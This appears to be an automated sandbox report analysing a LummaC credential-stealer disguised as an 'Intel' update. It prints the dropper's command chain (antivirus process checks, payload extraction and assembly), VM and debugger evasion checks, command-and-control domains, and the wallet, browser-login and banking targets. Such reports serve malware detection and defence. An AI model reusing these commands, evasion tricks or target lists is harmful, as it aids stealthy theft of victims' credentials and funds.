Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: [UPD]Intel_Unit.2.1.exe

Static file information: File size 1119746 > 1048576

Source: [UPD]Intel_Unit.2.1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: [UPD]Intel_Unit.2.1.exe

Static PE information: real checksum: 0x1150f2 should be: 0x11d4e3

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F30DE6 push ecx; ret

13_2_00F30DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00FA26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		13_2_00FA26DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F2FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		13_2_00F2FC7C

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_13-104889

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

API coverage: 3.7 %

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com TID: 2144

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_00F7DC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00F8A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00F8A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	13_2_00F7E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	13_2_00F8A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F866DC FindFirstFileW,FindNextFileW,FindClose,	13_2_00F866DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F4C622 FindFirstFileExW,	13_2_00F4C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	13_2_00F873D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F87333 FindFirstFileW,FindClose,	13_2_00F87333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_00F7D921

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F15FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

13_2_00F15FC8

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP4
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F8F4FF BlockInput,

13_2_00F8F4FF

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

13_2_00F1338B

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F35058 mov eax, dword ptr fs:[00000030h]

13_2_00F35058

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F720AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

13_2_00F720AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F42992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00F42992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F30BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00F30BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F30D45 SetUnhandledExceptionFilter,	13_2_00F30D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F30F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00F30F91

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: lastlossunbag.click

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

13_2_00F71B4D

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

13_2_00F1338B

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F7BBED SendInput,keybd_event,

13_2_00F7BBED

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F7ECD0 mouse_event,

13_2_00F7ECD0

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 686536	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Justify	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Backing" Kelly	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com Hugo.com y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F714AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

13_2_00F714AE

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F71FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

13_2_00F71FB0

Source: Hugo.com, 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmp, Hugo.com, 0000000D.00000003.2657829422.0000000004D3C000.00000004.00000800.00020000.00000000.sdmp, Enlarge.9.dr, Hugo.com.2.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Hugo.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F30A08 cpuid

13_2_00F30A08

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F6E5F4 GetLocalTime,

13_2_00F6E5F4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F6E652 GetUserNameW,

13_2_00F6E652

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F4BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

13_2_00F4BCD2

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Hugo.com, 0000000D.00000002.2765946345.0000000004959000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Hugo.com PID: 6596, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wal
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ctrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\OL^
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wal
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
